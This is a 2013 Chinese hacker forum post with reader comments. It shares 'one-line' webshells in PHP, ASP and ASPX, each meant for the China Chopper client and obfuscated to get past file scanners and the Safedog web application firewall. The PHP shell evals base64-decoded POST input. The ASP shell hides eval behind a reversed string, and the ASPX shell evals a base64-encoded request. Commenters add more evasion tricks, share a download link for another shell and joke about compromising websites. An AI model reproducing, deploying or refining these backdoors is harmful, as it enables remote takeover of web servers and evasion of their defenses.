其实已经不是一句话了,好几句了都。

继续上次的:我使用的一句话的几种姿态

这回研究了下PHP,发一下我使用的一句话(可过文件扫描)。

<?php 
$mujj = $_POST['z']; 
if ($mujj!="") 
{ 
  $xsser=base64_decode($_POST['z0']); 
  @eval("\$safedg = $xsser;"); 
} 
?>

密码z,支持菜刀连接;支持变异菜刀连接以过安全狗。

另外:

ASP:

<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%>

ASPX:

<script runat="server" language="JScript">
function popup(str) {
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b= eval(str,a);
return(b);
}
</script>
<%
popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));
%>

以上都已支持变异菜刀连接以过安全狗。

………………

请网站安全狗团队加入黑名单以便找出更佳的绕狗方法……

[原文地址]

相关吐槽:

1#

whirlwind (。。。。。。) | 2013-10-15 22:00

不错!

2#

RedFree (才了现了,自己是自己的神器。) | 2013-10-15 22:09

@whirlwind 各位看官,点5下感谢,我给你发ASP,ASPX,PHP都过狗的菜刀。不发@MuJJ 找@落叶纷飞 ……

3#

Lee Swagger (撸妹啊1020) | 2013-10-15 22:50

@RedFree 各位看官,点1下感谢 我给你发ASP,ASPX,PHP都过狗的菜刀

4#

江南的鱼 | 2013-10-15 23:13

哎,eval 关键字一扫,啥看不出?

目测过不了阿D扫描!

5#

RedFree (才了现了,自己是自己的神器。) | 2013-10-15 23:30

@江南的鱼 那就废了eval,execute,executeglobal,assert……吧,目测都是木马……^_^

6#

ACGT | 2013-10-16 08:39

建议用php函数array_map,一般不查

7#

江南的鱼 | 2013-10-16 09:00

我来个过阿D扫描的,很单纯的菜刀链接,不过狗!

http://pan.baidu.com/s/11N7nQ

下载地址:0.php

8#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-10-16 09:27

eval、Execute 硬伤啊……

9#

RedFree (才了现了,自己是自己的神器。) | 2013-10-16 10:22

@核攻击 安全狗够快,前一天发出来,第二天就不能用了…… 哈哈

10#

Lenwood (\r) | 2013-10-16 10:26

@RedFree 类似免杀了,方法多样。都是源码免杀,总有一款适合你。

留言评论(旧系统):

flowind @ 2013-10-16 15:05:47

国内的网站都被弄翻完了... 还在想办法? 有时候我还喜欢国外的系统.虽然进去难些.. 一般都不用考虑shell免杀与否..最原始的1句话还是很好用的.. 毕竟windows系统做服务器太少了.debian.bsd.aix.这些很多. 貌似都没安装类似狗狗之类的.. 唉 麻烦...

本站回复:

+1

日月 @ 2013-10-17 12:02:52

核总 有没有变异菜刀啊

本站回复:

自己动手改。

佚名 @ 2013-10-21 16:08:34

不错…………。。

本站回复:

+1